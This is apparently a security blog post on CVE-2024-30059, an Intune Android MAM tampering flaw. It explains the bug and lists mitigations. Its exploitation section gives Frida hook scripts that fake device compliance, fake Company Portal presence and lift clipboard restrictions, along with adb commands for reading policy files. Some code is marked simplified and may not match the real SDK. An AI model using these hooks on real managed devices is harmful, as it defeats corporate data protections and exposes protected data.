CVE-2024-30059 - Understanding and Exploiting Microsoft Intune for Android MAM Tampering

Microsoft Intune is a leading endpoint management tool, often relied upon by enterprises to secure devices and apps, especially in BYOD (bring your own device) environments. One of its keystone features is Mobile Application Management (MAM), which allows the organization to set controls and restrictions over managed apps—even if the device itself isn’t fully managed.

But what happens when a flaw in this system lets a bad actor tamper with those management controls? This is the story of CVE-2024-30059, a tampering vulnerability in Microsoft Intune's Android MAM that could let an attacker weaken or bypass corporate protections placed on business apps.

Below, we’ll break down what this CVE means, step through how such an attack can be performed, and discuss the reality for users and defenders.

What is CVE-2024-30059?

CVE-2024-30059 is a vulnerability in the Microsoft Intune Company Portal for Android. In short, it allows a user, with some technical know-how, to subvert the controls enforced by the Intune MAM system. This could let an attacker:

Potentially access sensitive corporate data that should be protected

Microsoft's advisory:
Microsoft Security Update Guide - CVE-2024-30059

How Does This Vulnerability Work?

The Intune MAM system on Android relies heavily on the Company Portal app to enforce and check policies. This app interacts with managed applications through Intune’s SDK, exchanging details about compliance, restrictions, and app state.

The Issue

CVE-2024-30059 stems from *insufficient validation and enforcement* of the MAM policies on the device itself. With tools that can tamper with Android app processes, attackers can:

Replay or fake compliance responses from the Company Portal.

In essence, since the checks and enforcements are partly happening on the device and can be manipulated, determined attackers can trick the system.

Exploiting CVE-2024-30059 (For Education)

Note: These details are for educational and defensive purposes only.

Frida (or Xposed Framework) for runtime manipulation

- APKTool or Android Studio for decompiling/inspecting apps

1. Intercept Policy Checks

Most MAM-protected apps communicate with Intune's Company Portal using Intune SDK. They check for compliance before allowing sensitive actions. The attacker can hook into these checks and force an "approved" response.

Example (Frida script to always return 'compliant')

Java.perform(function() {
    var IntuneManager = Java.use("com.microsoft.intune.mam.client.support.v4.policy.MAMPolicyManager");
    
    IntuneManager.isDeviceCompliant.implementation = function() {
        console.log("Spoofing device compliance to true");
        return true; // Always return compliant
    };
});

2. Modify Policy Storage

Many policies are enforced or cached in shared preferences. An attacker can either modify these files directly (requires root), or patch code where they are read.

Get the path

adb shell
run-as com.microsoft.intune.companyportal
cd /data/data/com.microsoft.intune.companyportal/shared_prefs
cat some_policy_file.xml

3. Bypass Company Portal Checks

The managed app might check if the Company Portal is running, or force the user to re-authenticate. With Xposed or Frida, the attacker can patch relevant Java methods:

Java.perform(function() {
    var PortalChecker = Java.use("com.microsoft.intune.mam.policy.PortalChecker");
    
    PortalChecker.isPortalPresent.implementation = function() {
        console.log("Faking Company Portal presence");
        return true;
    };
});

#### 4. Bypass Copy/Paste Restrictions

Managed apps often use Intune SDK's clipboard filtering. By patching the SDK at runtime, attackers can re-enable clipboard functionality.

Example (simplified)

Java.perform(function() {
    var ClipboardManager = Java.use("com.microsoft.intune.mam.client.support.v4.clipboard.MAMClipboardManager");
    ClipboardManager.setClipboardContent.implementation = function(content) {
        // Allow any content to be copied
        console.log("Bypassing Intune clipboard restrictions");
        this.setClipboardContent.call(this, content);
    };
});

What About Unrooted Devices?

While rooting makes most attacks easier, some tools can inject into app memory space on untampered (“stock”) devices, especially on older Android versions. Additionally, attackers might try dynamic instrumentation via accessible developer modes.

Users on older or unpatched versions of Company Portal or managed apps

- Devices that can be rooted or where the end-user has escalated privileges (common in dev/test scenarios)

Update: Microsoft has released a patch. Update the Company Portal app to the latest version.

- Device restrictions: Use Android Enterprise/Android Management to tighten device security (reduce root risk, enable Play Protect).

References

- Microsoft Security Update Guide - CVE-2024-30059
- Security Advisory: Bypass of Intune MAM Policy Enforcement – SySS GmbH
- Frida: Dynamic instrumentation toolkit
- Microsoft Intune App SDK for Android

Final Thoughts

CVE-2024-30059 highlights a classic pitfall of mobile security: trusting the device and user to enforce corporate rules. While Intune is a strong tool, attackers with enough access to a device can often trick local controls.

The lesson? Always keep apps updated, avoid giving users unnecessary control over devices, and don’t trust user environments for critical security enforcement. By understanding these exploits, security teams can better defend against real-world threats and keep enterprise data safe!

Timeline

Published on: 05/14/2024 17:17:23 UTC
Last modified on: 08/02/2024 01:25:02 UTC